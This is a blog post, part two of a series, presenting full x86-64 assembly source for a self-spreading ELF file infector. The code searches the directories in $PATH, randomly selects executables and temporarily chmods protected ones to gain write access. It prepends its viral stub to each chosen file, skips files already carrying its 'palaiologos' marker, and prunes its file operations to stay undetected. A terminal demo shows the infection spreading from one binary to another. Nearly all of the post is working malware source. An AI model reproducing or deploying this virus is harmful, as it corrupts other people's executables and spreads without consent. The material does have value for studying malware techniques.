A technique for ELF file infection - part 2.
Introduction
In the previous blog post, I demonstrated a method of infecting ELF files. In this post, I would like to present a slightly improved version with additional features. The previous version of the infection code could only infect a single file, while the new version will be able to find potential host files and infect them automatically.
A good source of potential victim files is the $PATH
environment variable, which contains a list of directories that may contain executable files. The program will search these directories for ELF files and infect them. The program will also check if the file is already infected to prevent infecting the same file multiple times. In addition, the program will ensure that it only attempts to infect ELF files that it has access to.
To begin, I will embed a marker in the stub to make it easily recognizable and add safety guards in case execve
fails. I will pass the argp
argument in rdi
to the payload
function so that it can use the $PATH
to find potential victim files.
format ELF64 executable
use64
; XXX: You have to set this to the resulting ELF file size manually.
SIZE equ 1486
; XXX: You have to set this to the position of the "palaiologos" string
; in the binary yourself.
SENTINEL_LOC equ 120
sys_execve equ 59
sys_open equ 2
sys_lseek equ 8
sys_memfd_create equ 319
sys_sendfile equ 40
sys_close equ 3
sys_exit equ 60
sys_getdents equ 78
sys_access equ 21
sys_stat equ 4
sys_chmod equ 90
entry _start
sentinel: db 'palaiologos',0
memfd_path: db '/proc/self/fd/',0,0
self: db '/proc/self/exe'
empty: db 0
size: dq SIZE
load_elf:
; Open ourselves.
xor esi, esi
mov edi, self
push sys_open
pop rax
syscall
; Obtain the length: seek to back.
mov r8, rax
mov rdi, r8
push sys_lseek
pop rax
syscall
; Call memfd_create, call with MFD_CLOEXEC.
mov edi, empty
push 1
pop rsi
push sys_memfd_create
pop rax
syscall
; Copy the file contents to the memfd using sendfile.
mov edx, size
mov r9, rax
mov rdi, rax
mov rsi, r8
sub r10d, SIZE
push sys_sendfile
pop rax
syscall
; Close the file descriptor we hold to our own binary.
push sys_close
pop rax
mov rdi, r8
syscall
; Bravely assume that the memfd descriptor number is a single digit.
; This might or might not work all of the times, but improving upon
; this is trivially beyond the scope of this post.
add r9d, 48
mov BYTE [memfd_path + 14], r9b
ret
; The entry point.
_start:
; Load the argp for the payload.
mov rdi, [rsp]
lea rdi, [rsp+8 + rdi*8 + 8]
call payload
; Load the executable to a memfd.
call load_elf
; Load the path to the executable
mov rdi, memfd_path
; Prepare to call execve
; Load argc + argv
lea rsi, [rsp + 8]
; Load argp
mov rdx, [rsp]
lea rdx, [rsp+8 + rdx*8 + 8]
; Perform the syscall
push sys_execve
pop rax
syscall
; Exit in case execve returns due to error.
mov rdi, -1
push sys_exit
pop rax
syscall
For the purposes of the new payload, I will need a random number generator (to determine whether to infect a file or not), a constant variable with the path separator (to append it between the directory name and the file name), and two auxiliary LCG random number generator variables.
seed: dq 0
pathsep: db "/", 0
LCG_A equ 1103515245
LCG_B equ 12345
Stalking for prey
The payload will be handling large amounts of stack data, so it must reserve sufficient space to ensure that argc
, argv
, or argp
are not overwritten during the process. This is also an opportune time to initialize the random number generator.
; Wants to be called with argp in rdi.
payload:
; Reserve a (somewhat arbitrary) amount of stack space.
; It needs to hold a few path buffers (3 buffers, 4096 bytes each)
sub rsp, 12456
; Query the current time stamp counter as a source of randomness.
; rdtsc will set rdx and rax to the higher and lower bits of the time
; stamp counter, so we put them together and store them in the RNG seed
; variable.
rdtsc
shl rdx, 32
or rdx, rax
mov qword [seed], rdx
The next part is more involved, as the code must locate the $PATH
variable in the environment key/value pair table. A simple solution is to iterate until the current envp entry is NULL
and check the prefix of the current entry. If it is PATH=
, discard the first 5 bytes (to skip the key name in the string) and save it to a register. This part is relatively straightforward, but it is essential to guard against environment key/value pairs that are shorter than 5 bytes in total to prevent a potential buffer overflow.
; Find "PATH=" in ARGP.
.path_find_loop:
; NULL terminates argp, check for this.
mov rax, qword [rdi]
test rax, rax
je .infect_done
; Load the first five bytes of the current string.
; If any of them is NUL, we skip to the next string.
mov cl, byte [rax]
test cl, cl
je .path_loop_skip
mov dl, byte [rax + 1]
test dl, dl
je .path_loop_skip
mov bl, byte [rax + 2]
test bl, bl
je .path_loop_skip
mov sil, byte [rax + 3]
test sil, sil
je .path_loop_skip
mov r8b, byte [rax + 4]
test r8b, r8b
je .path_loop_skip
; Check if the ASCII values are right.
cmp cl, 'P'
jne .path_loop_skip
cmp dl, 'A'
jne .path_loop_skip
cmp bl, 'T'
jne .path_loop_skip
cmp sil, 'H'
jne .path_loop_skip
cmp r8b, '='
je .path_found
.path_loop_skip:
; Go to the next pointer in the argp array.
add rdi, 8
jmp .path_find_loop
.path_found:
add rax, 5
Determine a buffer that will hold the final path to the file that will be infected. As I wrote this program and golfed it in advance, I will also load two constants that might appear to be arbitrary (a syscall number and a divider for the probability of infecting a directory).
; Select the final path buffer.
lea r12, [rsp + 4256]
; Load two auxiliary constants.
push 3
pop rbx
push sys_open
pop r8
At this point, the program can now loop through the entries in the PATH
variable and examine each of them. The loop will continue until it encounters a NULL
value (indicating that the PATH
string has been exhausted), and then copies the current path (that is, the string from the current position in the PATH
variable until the first occurrence of a colon or a NUL terminator, whichever comes first).
.path_loop:
; Check if we've hit the end of the PATH variable.
mov cl, byte [rax]
test cl, cl
je .infect_done
; Copy path until : or \0 is found.
xor r13d, r13d
.copy_path:
test cl, cl
je .attempt_scan
cmp cl, ':'
je .attempt_scan
mov byte [rsp + r13 + 160], cl
mov cl, byte [rax + r13 + 1]
inc r13
jmp .copy_path
.attempt_scan:
There are a few more things to be done with the path. Firstly, it must be null-terminated. Secondly, if the final character in the PATH
string is a colon, it must be skipped.
; NUL-terminate the path.
mov ecx, r13d
mov byte [rsp + rcx + 160], 0
xor ecx, ecx
; Check if we have to skip an extra colon.
cmp byte [rax + r13], ':'
sete cl
add rcx, rax
; Decide whether we want to infect this directory.
; Take a random number from a linear congruential generator
; and divide it by three. The modulus of zero means "no".
imul rax, qword [seed], LCG_A
add rax, LCG_B
mov qword [seed], rax
xor edx, edx
div rbx
test rdx, rdx
je .next_path
After obtaining a valid directory path, the program should now open it. It is crucial to verify the return code, as PATH entries do not have to be valid (they may not point to an existing directory). If the directory is invalid, it must be skipped.
; O_RDONLY | O_DIRECTORY
mov esi, 0x10000
lea rdi, [rsp + 160]
mov rax, r8
; Preserve rcx through the system call.
mov qword [rsp], rcx
syscall
mov rcx, qword [rsp]
; Clever way to determine whether the number is negative.
bt eax, 31
jb .next_path
; Save the file descriptor.
mov qword [rsp + 8], rax
; Copy the file descriptor elsewhere, because we are going to use
; it now, and it would be a shame if a syscall clobbered it ;).
mov rbp, rax
The program will use the fairly low-level system call getdents
to obtain directory entries in batches. Before proceeding, some entries should be randomly pruned to reduce the number of filesystem operations performed (which helps to remain undetected).
.getdents_loop:
; Load max path size.
mov edx, 4096
; Load the directory file descriptor.
mov rdi, rbp
; Load the buffer address.
lea rsi, [rsp + 8352]
push sys_getdents
pop rax
syscall
; Jump to some common error stub that will close the
; directory descriptor in case of failure.
test eax, eax
je .getdents_err
; Preserve the amount of entries somewhere.
; eax is often trashed by system calls so we want to
; avoid it being lost.
mov r14d, eax
xor eax, eax
.dir_loop:
; Load the current entry number, directory entries buffer
; and the random seed.
mov r15d, eax
lea rbx, [rsp + r15]
add rbx, 8352
mov rax, qword [seed]
.discard_loop:
; Done processing?
cmp r14, r15
jbe .getdents_loop
; Extract the type of the directory entry.
movzx ecx, word [rbx + 16]
mov dl, byte [rbx + rcx - 1]
; Skip if not a regular file. We will not infect symlinks.
cmp dl, 8
jne .give_up
; Invoke the LCG again. Skip the entry upfront if dividing by
; four gives modulus 0, that is, last two binary digits of the
; number are 0.
imul rax, rax, LCG_A
add rax, LCG_B
mov qword [seed], rax
test al, 3
je .discard_loop
With the file name, it is possible to construct the final buffer with the absolute path to be infected, taking care to address some quirks in the process.
; OK, first nul-terminate the final buffer with the filename
; so that the `concat` function can work properly. Then append the
; directory name to that empty final buffer.
mov byte [rsp + 4256], 0
mov rdi, r12
lea rsi, [rsp + 160]
call concat
; We need to terminate the path with a slash only if it is not present
; already. Check this. Use a dumb strlen-ish function.
mov rax, r12
.len_loop:
cmp byte [rax], 0
je .len_ok
inc rax
jmp .len_loop
.len_ok:
; Slash?
cmp byte [rax - 1], '/'
je .has_slash
mov esi, pathsep
mov rdi, r12
call concat
.has_slash:
; Append the file name now.
lea rsi, [rbx + 18]
mov rdi, r12
call concat
At this point, the program should check if the file is actually accessible for writing and devise a plan for what to do when it is not. The approach here is to try to temporarily alter the permissions of the file in the hope that it grants the necessary write access. If it does not, the file must be skipped. If it does, the program will restore the original permissions later.
; Check if we can access the file for reading and writing.
mov rdi, r12
push 6 ; R_OK | W_OK
pop rsi
push sys_access
pop rax
syscall
mov rcx, rax
; Decide whether we want to infect this file anyway.
; Same LCG and division stuff, except this time with the
; modulus of 10.
imul rax, qword [seed], LCG_A
add rax, LCG_B
mov qword [seed], rax
xor edx, edx
push 10
pop rsi
div rsi
; Proceed only if:
; (1) the file is not accessible
; (2) we want to infect it
; Handle a special case here: try to add an owner
; write permission bit to the file and see if this lets
; us access it... :). Might protect against some
; "overzealous" (removes write permissions on critical
; executables to avoid problems) but not "overly paranoid"
; (removes write permissions /and/ transfers ownership) users.
; In that case we can do nothing but hope that we get root somehow.
test ecx, ecx
je .normal_path
test rdx, rdx
jne .normal_path
; Stat the file.
mov rdi, r12
lea rsi, [rsp + 16]
push sys_stat
pop rax
syscall
; Set the owner write permission bit and call chmod.
mov esi, dword [rsp + 40]
or rsi, 128
mov dword [rsp + 40], esi
mov rbp, r12
push sys_chmod
pop r12
mov rax, r12
syscall
; Try to access again?
mov rdi, rbp
push 6 ; R_OK | W_OK again.
pop rsi
push sys_access
pop rax
syscall
; Still no? Restore the permissions.
test eax, eax
jne .restore_perms
; Yes => do infect.
mov rdi, rbp
call infect
.restore_perms:
mov esi, dword [rsp + 40]
and esi, -129 ; Everything except the bit 7
mov dword [rsp + 40], esi
mov rdi, rbp
mov rax, r12
syscall
; File still not accessible. Give up.
; Load the directory descriptor.
mov rax, qword [rsp + 8]
mov r12, rbp
mov rbp, rax
jmp .give_up
If no difficulties were encountered, the file can be infected now with no extra alterations.
.normal_path:
; Check if we want to infect this file.
test rdx, rdx
jne .give_up
; Do infect.
mov rdi, r12
call infect
Finally, a few fallback labels from the code defined above need to be implemented.
.give_up:
; We end up here when it's time to skip to
; the next directory entry.
movzx ecx, word [rbx + 16]
movzx eax, cx
add eax, r15d
jmp .dir_loop
.getdents_err:
; We get here when it's time to close the
; directory descriptor and move on.
mov rdi, rbp
push sys_close
pop rbx
mov rax, rbx
syscall
; Load the sys_open constant again
push sys_open
pop r8
mov rcx, qword [rsp]
.next_path:
; Go to the next path to process
add rcx, r13
mov rax, rcx
jmp .path_loop
.infect_done:
; Balance the stack and yield.
add rsp, 12456
ret
The payload employs a concat
procedure to join two nul-terminated strings. The implementation is relatively straightforward and is as follows:
concat:
; Find the end of the first string.
cmp byte [rdi], 0
lea rdi, [rdi + 1]
jne concat
; Start appending characters in a loop.
push -1
pop rax
.do_loop:
; Nothing left in the source string.
mov cl, byte [rsi + rax + 1]
test cl, cl
je .done
mov byte [rdi + rax], cl
inc rax
jmp .do_loop
.done:
; Null-terminate the string.
mov byte [rdi + rax], 0
ret
An improved infection function
The improved infection function will have several qualities that make it superior to the previous version. Most notably, the new infection function includes improved ELF file detection and better protection against re-infection. The process begins by opening the target file and reading and verifying the ELF header.
infect:
; Preserve a bunch of registers that the caller function needs.
push r15
push r14
push rbx
; Reserve enough space for the transaction buffer.
sub rsp, 200 + SIZE
; Open the goat file w/ O_RDWR.
mov rbx, sys_open
mov rsi, rbx
mov rax, rbx
syscall
; Check if the file was opened successfully.
bt eax, 31
jb .cleanup
; Read the ELF header.
mov r8d, eax
lea rsi, [rsp - 112]
; Size of the ELF header.
mov rdx, 64
mov rdi, r8
; sys_read = 0
xor eax, eax
syscall
; Check machine type (AMD64, code 62)
cmp word [rsi + 18], 62
jne .elf_bad
; ELF class (64-bit)
cmp byte [rsp - 108], 2
jne .elf_bad
; Check the 0x7f ELF magic.
cmp byte [rsp - 109], 'F'
jne .elf_bad
cmp byte [rsp - 110], 'L'
jne .elf_bad
cmp byte [rsp - 111], 'E'
jne .elf_bad
cmp byte [rsp - 112], 0x7F
jne .elf_bad
The function will check for the sentinel to determine if the file has already been infected. If the sentinel is present, the infection process should be terminated.
; Rewind to the SENTINEL_LOC-th byte. We want to check
; if this ELF file was already infected.
mov r9, sys_lseek
mov rsi, SENTINEL_LOC
mov rdi, r8
xor edx, edx
mov rax, r9
syscall
; Read 12 bytes (length of "palaiologos\0")
lea rsi, [rsp - 128]
mov rdx, 12
xor eax, eax
syscall
; Check if the sentinel is present.
movq xmm0, qword [rsi]
movq rax, xmm0
; Check the first part.
mov rcx, 'palaiolo'
cmp rax, rcx
jne .elf_clean
; Check the remaining bytes: gos\0
cmp byte [rsp - 120], 'g'
jne .elf_clean
cmp byte [rsp - 119], 'o'
jne .elf_clean
cmp byte [rsp - 118], 's'
jne .elf_clean
cmp byte [rsp - 117], 0
jne .elf_clean
.elf_bad:
; Close ourselves and return. Already infected.
mov rax, 3
mov rdi, r8
syscall
jmp .cleanup
.elf_clean:
The infection process is not much different from the previous iteration: the code will open the current executable, create a memory-backed file descriptor, and write the infectious stub to it followed by the target file.
; Open self.
mov edi, self
xor esi, esi
mov rax, rbx
syscall
; Open a memfd with O_CLOEXEC.
mov r10d, eax
mov r14, 1
mov edi, empty
mov eax, sys_memfd_create
mov rsi, r14
syscall
; Copy over the viral stub from ourselves to the memfd.
mov ebx, eax
lea r15, [rsp - 48]
mov edx, SIZE
mov rdi, r10
mov rsi, r15
xor eax, eax
syscall
mov edx, SIZE
mov rdi, rbx
mov rax, r14
syscall
; Seek to the beginning of the goat file (we want the ELf header back).
mov rdi, r8
xor esi, esi
xor edx, edx
mov rax, r9
syscall
; Copy data from the goat file to the memfd in a loop.
.copy_goat_memfd:
mov edx, SIZE
mov rdi, r8
mov rsi, r15
xor eax, eax
syscall
test eax, eax
je .copy_goat_memfd_done
mov edx, eax
mov rdi, rbx
mov rsi, r15
mov rax, r14
syscall
jmp .copy_goat_memfd
After constructing a valid parasitic ELF file, the final step is to rewind both files to the first byte and copy the contents of the memory-backed file descriptor to the target file. An improvement that could be made here is to check whether there is sufficient disk space to append the stub, but this scenario is extremely unlikely to pose an issue, so it is not worth the effort. It could, however, be implemented using ftruncate
followed by appropriate error checking.
; Rewind the goat file and the memfd.
.copy_goat_memfd_done:
mov rdi, rbx
xor esi, esi
xor edx, edx
mov rax, r9
syscall
mov rdi, r8
xor esi, esi
xor edx, edx
mov rax, r9
syscall
; Overwrite the goat file with the memfd contents.
lea rsi, [rsp - 48]
.copy_memfd_goat:
mov edx, SIZE
mov rdi, rbx
xor eax, eax
syscall
test eax, eax
je .copy_memfd_goat_done
mov edx, eax
mov rdi, r8
mov rax, r14
syscall
jmp .copy_memfd_goat
.copy_memfd_goat_done:
; Close goat, memfd, and self.
mov rdx, sys_close
mov rdi, rbx
mov rax, rdx
syscall
mov rdi, r8
mov rax, rdx
syscall
mov rdi, r10
mov rax, rdx
syscall
.cleanup:
; Balance the stack and quit.
add rsp, 200 + SIZE
pop rbx
pop r14
pop r15
ret
Conclusion
The new, improved ELF file infector is undoubtedly better than the original, however it still lacks a genuine payload, stealthiness, or code compression. I will discuss these topics in the next essay in the series, please stay tuned!
The following terminal session demonstrates the program’s capabilities. I have artificially created an environment with a single-directory $PATH
variable that contains two common UNIX programs. I have linked the date
program to the infector to reduce the amount of text output compared to the previous example using unzip
.
~ % echo $PATH
/home/palaiologos/jail
~ % ls -la jail
total 192
drwxr-xr-x 2 palaiologos palaiologos 4096 Jan 4 21:59 .
drwxr-xr-x 9 palaiologos palaiologos 20480 Jan 4 19:51 ..
-rwxr-xr-x 1 palaiologos palaiologos 44016 Jan 5 00:37 cat
-rwxr-xr-x 1 palaiologos palaiologos 125640 Jan 5 00:37 sh
~ % ./stub && ls -la jail
Thu Jan 5 12:45:33 AM CET 2023
total 196
drwxr-xr-x 2 palaiologos palaiologos 4096 Jan 4 21:59 .
drwxr-xr-x 9 palaiologos palaiologos 20480 Jan 4 19:51 ..
-rwxr-xr-x 1 palaiologos palaiologos 45450 Jan 5 00:45 cat
-rwxr-xr-x 1 palaiologos palaiologos 125640 Jan 5 00:37 sh
~ % # cat was infected! if we run it now, the shell should also get infected.
~ % ./jail/cat /dev/null && ls -la jail
total 196
drwxr-xr-x 2 palaiologos palaiologos 4096 Jan 4 21:59 .
drwxr-xr-x 9 palaiologos palaiologos 20480 Jan 4 19:51 ..
-rwxr-xr-x 1 palaiologos palaiologos 45450 Jan 5 00:45 cat
-rwxr-xr-x 1 palaiologos palaiologos 127074 Jan 5 00:37 sh